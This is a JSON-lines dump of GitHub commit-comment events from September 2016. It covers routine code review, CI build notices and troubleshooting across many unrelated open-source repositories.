{"id":"4624527712","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19191486,"position":null,"line":null,"path":null,"commit_id":"100637528d2f6b1bc36fe8dcf76d0bc63278ec9d","created_at":"2016-09-27T14:23:39Z","updated_at":"2016-09-27T14:23:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1179](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14351&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 260, ignored: 3 Build time: 00:09:46"}},"created_at":"2016-09-27T14:23:39Z"}
{"id":"4624530043","type":"CommitCommentEvent","actor":{"login":"thinkh"},"repo":{"name":"Caleydo/caleydo.github.io"},"payload":{"comment":{"id":19191493,"position":null,"line":null,"path":null,"commit_id":"5d1e8c9a1054fccb5730f46a65cfa29a00cd620c","created_at":"2016-09-27T14:24:01Z","updated_at":"2016-09-27T14:24:01Z","body":"Could you paste a screenshot here, so that I know what you mean?"}},"created_at":"2016-09-27T14:24:01Z"}
{"id":"4624534406","type":"CommitCommentEvent","actor":{"login":"Kakadu"},"repo":{"name":"embox/embox"},"payload":{"comment":{"id":19191504,"position":23,"line":23,"path":"src/net/util/show_packet.h","commit_id":"8ecf499184aeeb686c689d5c5b80be0f769948e2","created_at":"2016-09-27T14:24:42Z","updated_at":"2016-09-27T14:24:42Z","body":"Амперсандик не лишний, а?"}},"created_at":"2016-09-27T14:24:42Z"}
{"id":"4624537019","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191510,"position":7,"line":7,"path":".babelrc","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:25:07Z","updated_at":"2016-09-27T14:25:07Z","body":"when I try to npm run dev, I get the following:\r\n```\r\n   ...\r\n   [59] ./translations/fr.json 719 bytes {0} {1} [built]\r\n     + 5 hidden modules\r\n\r\nERROR in ./~/react-avatar-editor/dist/index.js\r\nModule build failed: ReferenceError: Unknown plugin \"babel-plugin-transform-es2015-modules-umd\" specified in \"/home/mallory/Pearson/modal-image-editor/node_modules/react-avatar-editor/.babelrc\" at 0, attempted to resolve relative to \"/home/mallory/Pearson/modal-image-editor/node_modules/react-avatar-editor\"\r\n    at /home/mallory/Pearson/modal-image-editor/node_modules/babel-core/lib/transformation/file/options/option-manager.js:193:17\r\n```\r\n\r\nI did npm install, am I missing something?"}},"created_at":"2016-09-27T14:25:07Z"}
{"id":"4624538673","type":"CommitCommentEvent","actor":{"login":"Niki-Max-911"},"repo":{"name":"Niki-Max-911/integration_prog_system_1"},"payload":{"comment":{"id":19191515,"position":null,"line":null,"path":null,"commit_id":"ff566269ec9ea563232de8bc76c6043ec98a4fb7","created_at":"2016-09-27T14:25:21Z","updated_at":"2016-09-27T14:25:21Z","body":"removed 8_commit. It's hash equal 2684c0ef8092bbcba017715cd04aa6056759adc3."}},"created_at":"2016-09-27T14:25:21Z"}
{"id":"4624541620","type":"CommitCommentEvent","actor":{"login":"imcaffrey"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19191520,"position":null,"line":null,"path":null,"commit_id":"39d5ed25a59da34b6b2c6af5db4b0af8cf7e226b","created_at":"2016-09-27T14:25:47Z","updated_at":"2016-09-27T14:25:47Z","body":"@andytimes 第一段话哪里有问题。。。 最近改错题做多了变得grammar nazi QAQ"}},"created_at":"2016-09-27T14:25:47Z"}
{"id":"4624543202","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19191524,"position":null,"line":null,"path":null,"commit_id":"751d51bda88adf2359c4590d0d84482783da4db7","created_at":"2016-09-27T14:26:03Z","updated_at":"2016-09-27T14:26:03Z","body":"@regalstreak  we now really dont need this :P"}},"created_at":"2016-09-27T14:26:03Z"}
{"id":"4624543437","type":"CommitCommentEvent","actor":{"login":"bjhartin"},"repo":{"name":"jamesdbloom/mockserver"},"payload":{"comment":{"id":19191526,"position":null,"line":null,"path":null,"commit_id":"35f8fe5c7bb251d800e95fe40ff63b6b0d5c9750","created_at":"2016-09-27T14:26:06Z","updated_at":"2016-09-27T14:26:06Z","body":"We use a variety of clients, some auto-generated, so I'm not sure if we can control the host header option for all.  However, we have a solution: we roll this into a docker image based on yours.  \r\n\r\nIf this isn't something you'd want to support, I can close the PR."}},"created_at":"2016-09-27T14:26:06Z"}
{"id":"4624544216","type":"CommitCommentEvent","actor":{"login":"NikoKrause"},"repo":{"name":"NikoKrause/cinnamon-slingshot"},"payload":{"comment":{"id":19191531,"position":null,"line":null,"path":null,"commit_id":"c8e93fa7ef2aadd229865a8abc9b921bb69fbce3","created_at":"2016-09-27T14:26:13Z","updated_at":"2016-09-27T14:26:13Z","body":"The categories are unsorted:\r\n![category_unsrt](https://cloud.githubusercontent.com/assets/8415124/18877818/ca7f59e4-84ce-11e6-991b-e60568a9123d.png)\r\nThis commit should fix it (Administration and Preferences are not sorted, they are at the very bottom of the categories list on purpose):\r\n![category_srt](https://cloud.githubusercontent.com/assets/8415124/18877871/f95e2646-84ce-11e6-8cb1-1551e24734c2.png)\r\n"}},"created_at":"2016-09-27T14:26:13Z"}
{"id":"4624545638","type":"CommitCommentEvent","actor":{"login":"nguyentruongtho"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":19191534,"position":null,"line":null,"path":null,"commit_id":"7329cb8e190cba9d6fc37621726a287b362024be","created_at":"2016-09-27T14:26:25Z","updated_at":"2016-09-27T14:26:25Z","body":"This commit is quite interesting, do you have some benchmark to prove the statement about \"significant performance improvement\"? @dinhviethoa  "}},"created_at":"2016-09-27T14:26:25Z"}
{"id":"4624545853","type":"CommitCommentEvent","actor":{"login":"dpostorivo"},"repo":{"name":"ThrowTheSwitch/Ceedling"},"payload":{"comment":{"id":19191535,"position":null,"line":null,"path":null,"commit_id":"61b3db601b8caf4e36145638a811e9f856cf6c76","created_at":"2016-09-27T14:26:27Z","updated_at":"2016-09-27T14:26:27Z","body":"@pennam  strip out all the arguments and see if it runs. It will still fail, as you need to specify which files are to be included, but see if the error stays the same. If it runs then one of the arguments is causing it, if not then rake cannot find gcovr.py. Also what version of  gcovr are you using. It has been tested on gcovr 3.1  and I'm not sure if other versions will behave differently. "}},"created_at":"2016-09-27T14:26:27Z"}
{"id":"4624546188","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19191536,"position":null,"line":null,"path":null,"commit_id":"3581792e3d0642a4f529f3c03d8cf15744aeabf3","created_at":"2016-09-27T14:26:31Z","updated_at":"2016-09-27T14:26:31Z","body":"This is boring."}},"created_at":"2016-09-27T14:26:31Z"}
{"id":"4624547872","type":"CommitCommentEvent","actor":{"login":"nuxwin"},"repo":{"name":"i-MSCP/imscp"},"payload":{"comment":{"id":19191539,"position":null,"line":null,"path":null,"commit_id":"acf39ea88bd9ce2a0a318d3efe239fa0a71967cf","created_at":"2016-09-27T14:26:46Z","updated_at":"2016-09-27T14:26:46Z","body":"@Ninos \r\n\r\nI can apply the working for ownclound instance as follow:\r\n\r\nAddin the following statement in the 00_nameserver.conf\r\n```\r\n<Location /core/templates/>\r\n  ProxyErrorOverride Off\r\n</Location>\r\n```\r\n\r\nProblems:\r\n\r\nThis is a non-viable solution. Different software can have their custom errordoc located elsewhere\r\nThe ProxyErrorOverride directory can be set in Location only since Apache 2.4 (in 2.2, this is not allowed). \r\n"}},"created_at":"2016-09-27T14:26:46Z"}
{"id":"4624547967","type":"CommitCommentEvent","actor":{"login":"emteeoh"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19191540,"position":null,"line":null,"path":null,"commit_id":"2d075602a6dd21ba779f611ebde3788b843b8bed","created_at":"2016-09-27T14:26:48Z","updated_at":"2016-09-27T14:26:48Z","body":"Its a name, really. With a laser cutter, you can cut, but you can also etch. With some materials, you can do even more. For example, foamcore has 3 layers, so you can imagine cuts that go through 2 layers but not all three. I *could* have each type of cut be its own element in a simple (name, power,speed) list, but I thought that doing the two layer hierarchy would be nicer to manage in the long run.\r\n\r\nFeel free to rename it (eg: \"cut name\") if that helps."}},"created_at":"2016-09-27T14:26:48Z"}
{"id":"4624548047","type":"CommitCommentEvent","actor":{"login":"OksanaPovkhanich"},"repo":{"name":"OksanaPovkhanich/UzNU"},"payload":{"comment":{"id":19191541,"position":null,"line":null,"path":null,"commit_id":"80ecf5759ef87ca24c5bc34178ccfb9f7f4f35c3","created_at":"2016-09-27T14:26:48Z","updated_at":"2016-09-27T14:26:48Z","body":"+"}},"created_at":"2016-09-27T14:26:48Z"}
{"id":"4624554482","type":"CommitCommentEvent","actor":{"login":"DanHarman"},"repo":{"name":"JetBrains/nunit"},"payload":{"comment":{"id":19191555,"position":null,"line":null,"path":null,"commit_id":"ad29539dca76c87dd11e2491cf8537f01a9e38e3","created_at":"2016-09-27T14:27:48Z","updated_at":"2016-09-27T14:27:48Z","body":"This would be useful in team city so we can use glob syntax to find tests without it choking on projects using mstest (sorry - legacy)."}},"created_at":"2016-09-27T14:27:48Z"}
{"id":"4624555719","type":"CommitCommentEvent","actor":{"login":"chuparCh0pper"},"repo":{"name":"chuparCh0pper/Snorlax"},"payload":{"comment":{"id":19191558,"position":null,"line":null,"path":null,"commit_id":"66206cd43186dadd657312a06a5911089807befd","created_at":"2016-09-27T14:27:59Z","updated_at":"2016-09-27T14:27:59Z","body":"OK I will do this in the next pull request have to go on a walk to test my code..."}},"created_at":"2016-09-27T14:27:59Z"}
{"id":"4624555862","type":"CommitCommentEvent","actor":{"login":"npasserini"},"repo":{"name":"npasserini/iceberg"},"payload":{"comment":{"id":19191559,"position":null,"line":null,"path":null,"commit_id":"47dadda71e9058168cc81cb3ee4878f73edbb3cb","created_at":"2016-09-27T14:28:00Z","updated_at":"2016-09-27T14:28:00Z","body":"Fixes #162"}},"created_at":"2016-09-27T14:28:00Z"}
{"id":"4624557982","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191562,"position":80,"line":80,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:28:19Z","updated_at":"2016-09-27T14:28:19Z","body":"So, this exists in another file and is being imported? If so, I dunno how we're going to deal with some aria things. Generally the modal is\r\n- labelledby the id of the modal heading (see below)\r\n- describedby the p inside in this case... won't be the case for a modal that is mostly a form but is if there's a good chunk of text (like the Delete text modal).\r\n\r\nAdditionally the Modal will have some other things like role=dialog but that goes wherever the Modal is."}},"created_at":"2016-09-27T14:28:19Z"}
{"id":"4624561044","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Exceptionless.Net"},"payload":{"comment":{"id":19191573,"position":5,"line":46,"path":"src/Exceptionless/Services/DefaultEnvironmentInfoCollector.cs","commit_id":"781b9615c0b093325e8106a3b36e0a407a6e16cd","created_at":"2016-09-27T14:28:47Z","updated_at":"2016-09-27T14:28:47Z","body":"I don't think this should be an error. I doubt if the friendly name is always available."}},"created_at":"2016-09-27T14:28:47Z"}
{"id":"4624564991","type":"CommitCommentEvent","actor":{"login":"DavidMStraub"},"repo":{"name":"flav-io/flavio"},"payload":{"comment":{"id":19191584,"position":null,"line":null,"path":null,"commit_id":"a2ac80cf59d089ba78ef8fcec1886397465dc8d0","created_at":"2016-09-27T14:29:21Z","updated_at":"2016-09-27T14:29:21Z","body":"Thanks for the proficient elucidation!"}},"created_at":"2016-09-27T14:29:21Z"}
{"id":"4624566729","type":"CommitCommentEvent","actor":{"login":"Quorafind"},"repo":{"name":"cccccccczy/hello-world"},"payload":{"comment":{"id":19191585,"position":null,"line":null,"path":null,"commit_id":"f7fd9b20102721632e417bb6a9e9aa3ddd47732f","created_at":"2016-09-27T14:29:36Z","updated_at":"2016-09-27T14:29:36Z","body":"## Just do it"}},"created_at":"2016-09-27T14:29:36Z"}
{"id":"4624567017","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19191587,"position":88,"line":88,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-27T14:29:39Z","updated_at":"2016-09-27T14:29:39Z","body":"I want to test this once it's a Thing on some screen readers, because it **used to be** that the dialog role threw a lot of them into applications mode (where all keystrokes are passed onto the browser and the user can't use SR navigation keys etc). **If** that's still the case then on this div we'll add role=document to \"undo\" the application mode \"dialog\" may add."}},"created_at":"2016-09-27T14:29:39Z"}
{"id":"4624567342","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Exceptionless.Net"},"payload":{"comment":{"id":19191589,"position":5,"line":46,"path":"src/Exceptionless/Services/DefaultEnvironmentInfoCollector.cs","commit_id":"781b9615c0b093325e8106a3b36e0a407a6e16cd","created_at":"2016-09-27T14:29:42Z","updated_at":"2016-09-27T14:29:42Z","body":"This will return string.empty by default I believe if it's not available. And this is only ever populated once."}},"created_at":"2016-09-27T14:29:42Z"}
{"id":"4624568031","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Exceptionless.Net"},"payload":{"comment":{"id":19191591,"position":14,"line":56,"path":"src/Exceptionless/Services/DefaultEnvironmentInfoCollector.cs","commit_id":"781b9615c0b093325e8106a3b36e0a407a6e16cd","created_at":"2016-09-27T14:29:48Z","updated_at":"2016-09-27T14:29:48Z","body":"Same for all of these. This is collecting bonus information. It sucks that we can't gather the info, but it won't keep the event from being submitted."}},"created_at":"2016-09-27T14:29:48Z"}
{"id":"4624569006","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19191594,"position":6,"line":8,"path":"HelloWorld/Miscellaneous/MemoryModel2.cs","commit_id":"807f008e39f64d052aa59524fe846905bf91a9f5","created_at":"2016-09-27T14:29:57Z","updated_at":"2016-09-27T14:29:57Z","body":"Будет лучше, если на каждой строчке будет указан только один член перечисления"}},"created_at":"2016-09-27T14:29:57Z"}
{"id":"4624569510","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19191597,"position":null,"line":null,"path":null,"commit_id":"2b0a7f82eaf7680357ca61bb27f6ae26451dffa9","created_at":"2016-09-27T14:30:02Z","updated_at":"2016-09-27T14:30:02Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-27T14:30:02Z"}
{"id":"4624575244","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19191607,"position":null,"line":null,"path":null,"commit_id":"b9dd11df538bcd084b7b18b9fe142574c3a4f2f1","created_at":"2016-09-27T14:30:52Z","updated_at":"2016-09-27T14:30:52Z","body":"`Qt::escape()` seems to work ok here in testing, so I've just pushed https://github.com/sqlitebrowser/sqlitebrowser/commit/482502f4f4634b254f875b086ac4ebb001f0e404 with that."}},"created_at":"2016-09-27T14:30:52Z"}
{"id":"4624577497","type":"CommitCommentEvent","actor":{"login":"emteeoh"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19191611,"position":null,"line":null,"path":null,"commit_id":"4c7fdef36f85b389dfd296f67f563c568ea9180c","created_at":"2016-09-27T14:31:13Z","updated_at":"2016-09-27T14:31:13Z","body":"What do the <i class=\"fa fa-fw fa-plus\" aria-hidden=\"true\"></i> do, other than add padding? Or are they part of a work in progress?"}},"created_at":"2016-09-27T14:31:13Z"}
{"id":"4624582405","type":"CommitCommentEvent","actor":{"login":"revolter"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19191622,"position":null,"line":null,"path":null,"commit_id":"482502f4f4634b254f875b086ac4ebb001f0e404","created_at":"2016-09-27T14:31:49Z","updated_at":"2016-09-27T14:31:49Z","body":"Wow, I just wanted to do this myself. Though I would think that\r\n\r\n    #if QT_VERSION < 0x050000\r\n                                    sqlWidget->getModel()->totalRowCount()).arg(timer.elapsed()).arg(Qt::escape(queryPart.trimmed()));\r\n    #else\r\n                                    sqlWidget->getModel()->totalRowCount()).arg(timer.elapsed()).arg(queryPart.trimmed().toHtmlEscaped());\r\n    #endif\r\n\r\nto ease out the Qt5 migration."}},"created_at":"2016-09-27T14:31:49Z"}
{"id":"4624587310","type":"CommitCommentEvent","actor":{"login":"br-privacore"},"repo":{"name":"privacore/open-source-search-engine"},"payload":{"comment":{"id":19191631,"position":null,"line":null,"path":null,"commit_id":"b26cfcf7882796cf31dc32f5dd343889c52b8dcb","created_at":"2016-09-27T14:32:29Z","updated_at":"2016-09-27T14:32:29Z","body":"Oops :("}},"created_at":"2016-09-27T14:32:29Z"}
{"id":"4624587725","type":"CommitCommentEvent","actor":{"login":"Olympic1"},"repo":{"name":"KSP-CKAN/CKAN-meta"},"payload":{"comment":{"id":19191632,"position":null,"line":null,"path":null,"commit_id":"4a20b13d607fd067aa1e0f81b1b20b87b208c99a","created_at":"2016-09-27T14:32:31Z","updated_at":"2016-09-27T14:32:31Z","body":"oops 😕"}},"created_at":"2016-09-27T14:32:31Z"}
{"id":"4624589005","type":"CommitCommentEvent","actor":{"login":"TihonovaDiana"},"repo":{"name":"TihonovaDiana/Diana"},"payload":{"comment":{"id":19191634,"position":null,"line":null,"path":null,"commit_id":"f513c0ae2d1992e0ae12b42ea21b060e8c9856b4","created_at":"2016-09-27T14:32:40Z","updated_at":"2016-09-27T14:32:40Z","body":"yravnenie"}},"created_at":"2016-09-27T14:32:40Z"}
{"id":"4624589509","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Exceptionless.Net"},"payload":{"comment":{"id":19191636,"position":14,"line":56,"path":"src/Exceptionless/Services/DefaultEnvironmentInfoCollector.cs","commit_id":"781b9615c0b093325e8106a3b36e0a407a6e16cd","created_at":"2016-09-27T14:32:44Z","updated_at":"2016-09-27T14:32:44Z","body":"So trace message?"}},"created_at":"2016-09-27T14:32:44Z"}
{"id":"4624591565","type":"CommitCommentEvent","actor":{"login":"FGM"},"repo":{"name":"fubhy/graphql-drupal"},"payload":{"comment":{"id":19191641,"position":54,"line":54,"path":"tests/src/Kernel/QueryTestBase.php","commit_id":"956f817d041f210241a677bcf73f6ed173722667","created_at":"2016-09-27T14:33:01Z","updated_at":"2016-09-27T14:33:01Z","body":"Indeedd"}},"created_at":"2016-09-27T14:33:01Z"}
{"id":"4624593633","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19191646,"position":null,"line":null,"path":null,"commit_id":"69f711a0a3823ca60f4f9981243d74438dcbf813","created_at":"2016-09-27T14:33:18Z","updated_at":"2016-09-27T14:33:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1180](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14364&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T14:33:18Z"}
{"id":"4624595660","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19191654,"position":18,"line":31,"path":"src/js/component-owner.js","commit_id":"96cbc8aea9bda087c6fa9e8f2d00259afc7cb578","created_at":"2016-09-27T14:33:36Z","updated_at":"2016-09-27T14:33:36Z","body":"since we're using a proper input element, the slider doesn't need an id (unless you need an id) but instead the \"for\" attribute (htmlFor in React) to match the input's id."}},"created_at":"2016-09-27T14:33:36Z"}
{"id":"4624599587","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19191661,"position":33,"line":35,"path":"scripts/landing.js","commit_id":"6a1f8943772ea815d8ce03ce9abcfdb6a05ba278","created_at":"2016-09-27T14:34:13Z","updated_at":"2016-09-27T14:34:13Z","body":"new line"}},"created_at":"2016-09-27T14:34:13Z"}
{"id":"4624599818","type":"CommitCommentEvent","actor":{"login":"eseokoh"},"repo":{"name":"CUBRID/cubrid"},"payload":{"comment":{"id":19191662,"position":null,"line":null,"path":null,"commit_id":"bb14ac487cde91fcca519ceb63580c371a809833","created_at":"2016-09-27T14:34:15Z","updated_at":"2016-09-27T14:34:15Z","body":"Yeah. :)"}},"created_at":"2016-09-27T14:34:15Z"}
{"id":"4624602231","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19191666,"position":25,"line":52,"path":"HelloWorld/Miscellaneous/MemoryModel2.cs","commit_id":"807f008e39f64d052aa59524fe846905bf91a9f5","created_at":"2016-09-27T14:34:36Z","updated_at":"2016-09-27T14:34:36Z","body":"Если метод называется Get*Что-то*, то ожидается, что его возвращаемым значением будет именно это *Что-то*, в данном случае набор инструкций. То, что вовзращаемая величина - именно размер памяти, а не количество инструкций, наприер, понять практически невозможно, не заглядывая внутрь. Будет лучше назвать такой метод WriteInstructions и сделать размер памяти out-параметром."}},"created_at":"2016-09-27T14:34:36Z"}
{"id":"4624603748","type":"CommitCommentEvent","actor":{"login":"rschiepers"},"repo":{"name":"rschiepers/hello-world"},"payload":{"comment":{"id":19191669,"position":null,"line":null,"path":null,"commit_id":"e22f000022819031201b8d8006721ec1e3566821","created_at":"2016-09-27T14:34:50Z","updated_at":"2016-09-27T14:34:50Z","body":"Hi humans,\r\nMe here, "}},"created_at":"2016-09-27T14:34:50Z"}
{"id":"4624604564","type":"CommitCommentEvent","actor":{"login":"StommePoes"},"repo":{"name":"Pearson-Higher-Ed/slider"},"payload":{"comment":{"id":19191670,"position":18,"line":31,"path":"src/js/component-owner.js","commit_id":"96cbc8aea9bda087c6fa9e8f2d00259afc7cb578","created_at":"2016-09-27T14:34:58Z","updated_at":"2016-09-27T14:34:58Z","body":"In Javascript, \"for\" is a reserved word (loops) so in React/JS in general you use HTMLFor instead."}},"created_at":"2016-09-27T14:34:58Z"}
{"id":"4624607253","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19191678,"position":null,"line":null,"path":null,"commit_id":"d43b1f00b0b18af8f828b998f46af7b384c3e1fa","created_at":"2016-09-27T14:35:23Z","updated_at":"2016-09-27T14:35:23Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#TeuDYQkLRIao8yqT5A948w"}},"created_at":"2016-09-27T14:35:23Z"}
{"id":"4624608496","type":"CommitCommentEvent","actor":{"login":"pnorman"},"repo":{"name":"openstreetmap/openstreetmap-website"},"payload":{"comment":{"id":19191681,"position":null,"line":null,"path":null,"commit_id":"fdcd867de6574688935458f3c099beb5987a1c6e","created_at":"2016-09-27T14:35:34Z","updated_at":"2016-09-27T14:35:34Z","body":"I don't see this as blocking, because there is still other discussion taking place in #1299. It's probably best to carry the discussion of reporting mechanisms and who evaluates code of conduct complaints over there to keep the discussion together."}},"created_at":"2016-09-27T14:35:34Z"}
{"id":"4624609473","type":"CommitCommentEvent","actor":{"login":"nanutza"},"repo":{"name":"nyc-bobolinks-2016/apartments-challenge"},"payload":{"comment":{"id":19191682,"position":13,"line":13,"path":"apartment.rb","commit_id":"8de576c8a21515553e60741a2b641ddfa4e9f2a5","created_at":"2016-09-27T14:35:42Z","updated_at":"2016-09-27T14:35:42Z","body":"rooms.count {|room| room.name == 'bedroom'}"}},"created_at":"2016-09-27T14:35:42Z"}
{"id":"4624610143","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19191684,"position":7,"line":45,"path":"index.html","commit_id":"b0b773cdbcf4848001b1a1ef7e16626d49b6108a","created_at":"2016-09-27T14:35:48Z","updated_at":"2016-09-27T14:35:48Z","body":"new line"}},"created_at":"2016-09-27T14:35:48Z"}
{"id":"4624610269","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Exceptionless.Net"},"payload":{"comment":{"id":19191685,"position":5,"line":46,"path":"src/Exceptionless/Services/DefaultEnvironmentInfoCollector.cs","commit_id":"781b9615c0b093325e8106a3b36e0a407a6e16cd","created_at":"2016-09-27T14:35:50Z","updated_at":"2016-09-27T14:35:50Z","body":"I still don't think it should be an error. Again it's just bonus information. Info seemed like the proper level. Maybe at most a warning, but definitely not an error."}},"created_at":"2016-09-27T14:35:50Z"}
{"id":"4624612299","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Exceptionless.Net"},"payload":{"comment":{"id":19191690,"position":14,"line":56,"path":"src/Exceptionless/Services/DefaultEnvironmentInfoCollector.cs","commit_id":"781b9615c0b093325e8106a3b36e0a407a6e16cd","created_at":"2016-09-27T14:36:08Z","updated_at":"2016-09-27T14:36:08Z","body":"Same as above. Should be info or maybe warning."}},"created_at":"2016-09-27T14:36:08Z"}
{"id":"4624612397","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19191691,"position":null,"line":null,"path":null,"commit_id":"482502f4f4634b254f875b086ac4ebb001f0e404","created_at":"2016-09-27T14:36:09Z","updated_at":"2016-09-27T14:36:09Z","body":"Not sure.  That kind of sounds like unnecessary complication?\r\n\r\nOr are you meaning that when we go Qt5-only, it will be easier to locate this and just delete the Qt4 only bit?  If that's the case, then sure, feel free to update it. :smile:"}},"created_at":"2016-09-27T14:36:09Z"}
{"id":"4624616234","type":"CommitCommentEvent","actor":{"login":"ejsmith"},"repo":{"name":"exceptionless/Exceptionless.Net"},"payload":{"comment":{"id":19191697,"position":14,"line":56,"path":"src/Exceptionless/Services/DefaultEnvironmentInfoCollector.cs","commit_id":"781b9615c0b093325e8106a3b36e0a407a6e16cd","created_at":"2016-09-27T14:36:43Z","updated_at":"2016-09-27T14:36:43Z","body":"https://github.com/NLog/NLog/wiki/Configuration-file#log-levels"}},"created_at":"2016-09-27T14:36:43Z"}
{"id":"4624616565","type":"CommitCommentEvent","actor":{"login":"katsos"},"repo":{"name":"Michalis89/michalis89"},"payload":{"comment":{"id":19191698,"position":null,"line":null,"path":null,"commit_id":"3f20c58f28e1e8b44e50f74e68137f889cd4439a","created_at":"2016-09-27T14:36:47Z","updated_at":"2016-09-27T14:36:47Z","body":"👍 "}},"created_at":"2016-09-27T14:36:47Z"}
{"id":"4624617318","type":"CommitCommentEvent","actor":{"login":"vicb"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19191700,"position":null,"line":null,"path":null,"commit_id":"712d1a7c37b5dcd2878f814e64cfe44744f30f28","created_at":"2016-09-27T14:36:53Z","updated_at":"2016-09-27T14:36:53Z","body":"milestone 2.0.1 should be 2.0.x (ie patch releases)"}},"created_at":"2016-09-27T14:36:53Z"}
{"id":"4624620822","type":"CommitCommentEvent","actor":{"login":"Passhico"},"repo":{"name":"Passhico/cursoSymfony"},"payload":{"comment":{"id":19191709,"position":16,"line":16,"path":"src/AppBundle/Controller/SaludaController.php","commit_id":"e43021e1735dbf2b5bcce4a4c73ce92330358257","created_at":"2016-09-27T14:37:24Z","updated_at":"2016-09-27T14:37:24Z","body":"hi this is a comment"}},"created_at":"2016-09-27T14:37:24Z"}
{"id":"4624621239","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19191711,"position":null,"line":null,"path":null,"commit_id":"9872c7547a6f16bae345ec67642870cadc8b2d4e","created_at":"2016-09-27T14:37:28Z","updated_at":"2016-09-27T14:37:28Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#ehPMqM5CSuOrvpmImfGoiw"}},"created_at":"2016-09-27T14:37:28Z"}
{"id":"4624623628","type":"CommitCommentEvent","actor":{"login":"andytimes"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19191718,"position":null,"line":null,"path":null,"commit_id":"39d5ed25a59da34b6b2c6af5db4b0af8cf7e226b","created_at":"2016-09-27T14:37:50Z","updated_at":"2016-09-27T14:37:50Z","body":"@imcaffrey 我也不清楚、、、"}},"created_at":"2016-09-27T14:37:50Z"}
{"id":"4624626776","type":"CommitCommentEvent","actor":{"login":"Roadirsh"},"repo":{"name":"barryvdh/laravel-translation-manager"},"payload":{"comment":{"id":19191721,"position":null,"line":null,"path":null,"commit_id":"0d253bf75236fdc0486ee7696bd7d756c7f5bc1b","created_at":"2016-09-27T14:38:17Z","updated_at":"2016-09-27T14:38:17Z","body":"Pluck in 5.2 is like lists in 5.1 for a collection but pluck for an Eloquent Builder return a string. \r\nhttps://laravel.com/api/5.1/Illuminate/Database/Eloquent/Builder.html#method_pluck\r\nAnd it is no good for array_merge. "}},"created_at":"2016-09-27T14:38:17Z"}
